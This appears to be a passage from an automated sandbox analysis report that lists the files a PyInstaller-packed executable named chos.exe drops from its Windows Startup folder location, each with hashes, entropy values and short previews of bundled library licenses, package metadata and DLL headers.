SHA-512:	EC13CAC9DF03676640EF5DA033E8C2FAEE63916F27CC27B9C43F0824B98AB4A6ECB4C8D7D039FA6674EF189BDD9265C8ED509C1D80DFF610AEB9E081093AEB3D
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: maturin (1.7.5).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.

C:\Users\user\AppData\Local\Temp\_MEI98882\cryptography-44.0.0.dist-info\licenses\LICENSE

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	197
Entropy (8bit):	4.61968998873571
Encrypted:	false
SSDEEP:	3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
MD5:	8C3617DB4FB6FAE01F1D253AB91511E4
SHA1:	E442040C26CD76D1B946822CAF29011A51F75D6D
SHA-256:	3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
SHA-512:	77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
Malicious:	false
Preview:	This software is made available under the terms of either of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of both these licenses..

C:\Users\user\AppData\Local\Temp\_MEI98882\cryptography-44.0.0.dist-info\licenses\LICENSE.APACHE

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11360
Entropy (8bit):	4.426756947907149
Encrypted:	false
SSDEEP:	192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
MD5:	4E168CCE331E5C827D4C2B68A6200E1B
SHA1:	DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
SHA-256:	AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
SHA-512:	F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
Malicious:	false
Preview:	. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

C:\Users\user\AppData\Local\Temp\_MEI98882\cryptography-44.0.0.dist-info\licenses\LICENSE.BSD

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1532
Entropy (8bit):	5.058591167088024
Encrypted:	false
SSDEEP:	24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
MD5:	5AE30BA4123BC4F2FA49AA0B0DCE887B
SHA1:	EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
SHA-256:	602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
SHA-512:	DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
Malicious:	false
Preview:	Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

C:\Users\user\AppData\Local\Temp\_MEI98882\cryptography\hazmat\bindings\_rust.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8292864
Entropy (8bit):	6.493076254122072
Encrypted:	false
SSDEEP:	98304:Y4sf3zg+qUuQdPJMqYLSxuBLZqwt0kDO+5+O:cdeqYLSxuBLZrGjq+
MD5:	34293B976DA366D83C12D8EE05DE7B03
SHA1:	82B8EB434C26FCC3A5D9673C9B93663C0FF9BF15
SHA-256:	A2285C3F2F7E63BA8A17AB5D0A302740E6ADF7E608E0707A7737C1EC3BD8CECC
SHA-512:	0807EC7515186F0A989BB667150A84FF3BEBCC248625597BA0BE3C6F07AD60D70CF8A3F65191436EC16042F446D4248BF92FCD02212E459405948DB10F078B8E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.j...j...j....F..j.......j.......j.......j.......j.......j.......j...j...h.......i...j...j.......j.......j..Rich.j..........................PE..d....^Gg.........." ...*.R\..n"......~Z.......................................~...........`...........................................x.X.....x...............y...............~.......o.T.....................o.(...p.o.@............p\.8............................text....Q\......R\................. ..`.rdata..P9...p\..:...V\.............@..@.data... >....x.......x.............@....pdata........y.......y.............@..@.reloc........~.......}.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\libcrypto-3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5232408
Entropy (8bit):	5.940072183736028
Encrypted:	false
SSDEEP:	98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
MD5:	123AD0908C76CCBA4789C084F7A6B8D0
SHA1:	86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
SHA-256:	4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
SHA-512:	80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.\|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...\|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\libffi-8.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39696
Entropy (8bit):	6.641880464695502
Encrypted:	false
SSDEEP:	768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
MD5:	0F8E4992CA92BAAF54CC0B43AACCCE21
SHA1:	C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
SHA-256:	EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
SHA-512:	6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\libssl-3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	792856
Entropy (8bit):	5.57949182561317
Encrypted:	false
SSDEEP:	12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
MD5:	4FF168AAA6A1D68E7957175C8513F3A2
SHA1:	782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
SHA-256:	2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
SHA-512:	C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...\|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\pyexpat.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	201488
Entropy (8bit):	6.375994899027017
Encrypted:	false
SSDEEP:	6144:cAPHiRwroqoLHMpCSNVysh9CV2i6P/1vTg:6wrExSU6PdvTg
MD5:	CF2C3D127F11CB2C026E151956745564
SHA1:	B1C8C432FC737D6F455D8F642A4F79AD95A97BD3
SHA-256:	D3E81017B4A82AE1B85E8CD6B9B7EB04D8817E29E5BC9ECE549AC24C8BB2FF23
SHA-512:	FE3A9C8122FFFF4AF7A51DF39D40DF18E9DB3BC4AED6B161A4BE40A586AC93C1901ACDF64CC5BFFF6975D22073558FC7A37399D016296432057B8150848F636E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P.P.P.(t..P...P...P...P...P....P..(.P.P..P....P....P......P....P.Rich.P.........................PE..d.....g.........." ...)..................................................... ............`............................................P... ............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\python3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70416
Entropy (8bit):	6.1258200129869405
Encrypted:	false
SSDEEP:	768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
MD5:	16855EBEF31C5B1EBE767F1C617645B3
SHA1:	315521F3A748ABFA35CD4D48E8DD09D0556D989B
SHA-256:	A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
SHA-512:	C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\python313.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6083856
Entropy (8bit):	6.126922729922386
Encrypted:	false
SSDEEP:	49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
MD5:	B9DE917B925DD246B709BB4233777EFD
SHA1:	775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
SHA-256:	0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
SHA-512:	F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\select.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30992
Entropy (8bit):	6.554484610649281
Encrypted:	false
SSDEEP:	384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
MD5:	20831703486869B470006941B4D996F2
SHA1:	28851DFD43706542CD3EF1B88B5E2749562DFEE0
SHA-256:	78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
SHA-512:	4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\INSTALLER

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\LICENSE

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11358
Entropy (8bit):	4.4267168336581415
Encrypted:	false
SSDEEP:	192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
MD5:	3B83EF96387F14655FC854DDC3C6BD57
SHA1:	2B8B815229AA8A61E483FB4BA0588B8B6C491890
SHA-256:	CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
SHA-512:	98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
Malicious:	false
Preview:	. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\METADATA

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4648
Entropy (8bit):	5.006900644756252
Encrypted:	false
SSDEEP:	96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
MD5:	98ABEAACC0E0E4FC385DFF67B607071A
SHA1:	E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
SHA-256:	6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
SHA-512:	F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\RECORD

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.6307766747793275
Encrypted:	false
SSDEEP:	48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
MD5:	EB513CAFA5226DDA7D54AFDCC9AD8A74
SHA1:	B394C7AEC158350BAF676AE3197BEF4D7158B31C
SHA-256:	0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
SHA-512:	A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
Malicious:	false
Preview:	importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\WHEEL

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	91
Entropy (8bit):	4.687870576189661
Encrypted:	false
SSDEEP:	3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
MD5:	7D09837492494019EA51F4E97823D79F
SHA1:	7829B4324BB542799494131A270EC3BDAD4DEDEF
SHA-256:	9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
SHA-512:	A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	19
Entropy (8bit):	3.536886723742169
Encrypted:	false
SSDEEP:	3:JSej0EBERG:50o4G
MD5:	A24465F7850BA59507BF86D89165525C
SHA1:	4E61F9264DE74783B5924249BCFE1B06F178B9AD
SHA-256:	08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
SHA-512:	ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
Malicious:	false
Preview:	importlib_metadata.

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text, with very long lines (888)
Category:	dropped
Size (bytes):	1335
Entropy (8bit):	4.226823573023539
Encrypted:	false
SSDEEP:	24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
MD5:	4CE7501F6608F6CE4011D627979E1AE4
SHA1:	78363672264D9CD3F72D5C1D3665E1657B1A5071
SHA-256:	37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
SHA-512:	A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
Malicious:	false
Preview:	Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\wheel-0.43.0.dist-info\INSTALLER

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1107
Entropy (8bit):	5.115074330424529
Encrypted:	false
SSDEEP:	24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
MD5:	7FFB0DB04527CFE380E4F2726BD05EBF
SHA1:	5B39C45A91A556E5F1599604F1799E4027FA0E60
SHA-256:	30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
SHA-512:	205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
Malicious:	false
Preview:	MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\wheel-0.43.0.dist-info\METADATA

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
